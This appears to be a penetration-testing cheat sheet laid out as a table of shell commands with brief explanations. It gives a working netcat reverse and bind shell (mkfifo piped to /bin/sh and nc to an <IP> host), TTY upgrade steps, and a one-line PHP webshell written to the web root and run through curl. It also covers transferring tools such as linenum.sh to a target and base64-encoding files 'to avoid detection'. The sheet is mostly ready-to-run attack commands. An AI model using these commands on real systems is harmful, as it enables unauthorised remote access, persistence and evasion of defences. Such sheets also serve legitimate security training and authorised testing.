nc -lvnp 4444 |
Start a nc listener, verbose mode, DnS resolution disabled in a local port |
nc <IP> 4444 |
Connect to a bind shell started on the remote server |
| Reverse shell cheat sheet |
|
| Bind shell cheat sheet |
|
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc <IP> 4444 >/tmp/f (reverse)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/bash -i 2>&1 |nc -lvp 4444 >/tmp/f (bind) |
Forward Shells |
script /dev/null -c bash
ctrl+z
stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=bash
stty rows X columns Y |
TTY upgrading |
python -c 'import pty; pty.spawn("/bin/bash")' |
TTY upgrading (python) |
echo "<?php system($_GET['cmd']);?>" > /var/www/html/shell.php |
Create a webshell php file |
curl http://<IP>/shell.php?cmd=id |
Execute a command on an uploaded webshell |
| Transferring Files |
|
python3 -m http.server 4444 |
Start a local webserver |
wget http://<IP>:4444/linenum.sh |
Download a file on the remote server from our local machine |
url http://<IP>:4444/linenum.sh -o linenum.sh |
Download a file on the remote server from our local machine |
scp linenum.sh user@<IP>:/tmp/linenum.sh |
Transfer a file to the remote server with scp (requires SSH access with password) |
base64 linenum.sh -w 0 |
Convert a file to base64, useful to avoid detection |
echo f0VMR...SNIO...InmDwU | base64 -d > linenum.sh |
Convert a file from base64 back to its orig |
md5sum shell |
Check the file's md5sum to ensure it converted correctly |